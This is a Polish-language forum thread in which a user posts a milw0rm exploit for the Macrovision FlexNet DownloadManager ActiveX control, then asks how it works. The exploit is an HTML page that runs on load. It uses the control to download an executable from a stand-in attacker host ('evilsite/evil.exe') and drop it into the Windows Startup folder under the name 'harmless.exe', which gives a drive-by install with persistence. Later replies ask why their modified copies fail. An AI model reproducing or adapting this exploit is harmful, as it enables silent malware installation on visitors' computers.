Macrovision FlexNet DownloadManager Insecure Methods Exploit

W

witko2006

Użytkownik
Dołączył
Wrzesień 21, 2007
Posty
12
Kod: 
<!-- 

Macrovision FlexNet DownloadManager Insecure Methods Exploit

Implemented Categories:

Category: Safe for Scripting

Written by e.b.

Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.61372

-->

<html>

 <head>

  <title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title>

  <script language="JavaScript" defer>

    function Check() {

     

    var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}");

    

    mJob.AddFile("http://www.evilsite/evil.exe","C:Documents and SettingsAll UsersStart MenuProgramsStartupharmless.exe");

    mJob.SetPriority(0);

    mJob.SetNotifyFlags(2);

    mJob.ScheduleInterval = 2;

    

    obj.RunScheduledJobs();

                

          

    } 

   

   </script>

  </head>

 <body onload="JavaScript: return Check();">

    <object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0" width="0">

     Unable to create object

    </object>

 </body>

</html>



# milw0rm.com [2008-01-14]

Okey, teraz czas na pytanka:

1. Z tego co zauwazylem to ten exploit to downloader:

Kod: 
mJob.AddFile("http://www.evilsite/evil.exe","C:Documents and SettingsAll UsersStart MenuProgramsStartupharmless.exe");

Prawda / Falsz ??

2. Czy ten exploit dziala tylko wowczas gdy ktos posiada tego softa czy tez ogolnie ?

[/list]
 
S

smajl

Użytkownik
Dołączył
Luty 9, 2008
Posty
9
Coś wiecej na ten temat? wyedytowalem to wyskakuje mi Unable to create object :S
 
G

gelman8

Użytkownik
Dołączył
Luty 2, 2009
Posty
2
mi tez wyskakuje unable to create object, wie moze ktos w czym tkwi problem?
 
You must log in or register to reply here.
Do góry Bottom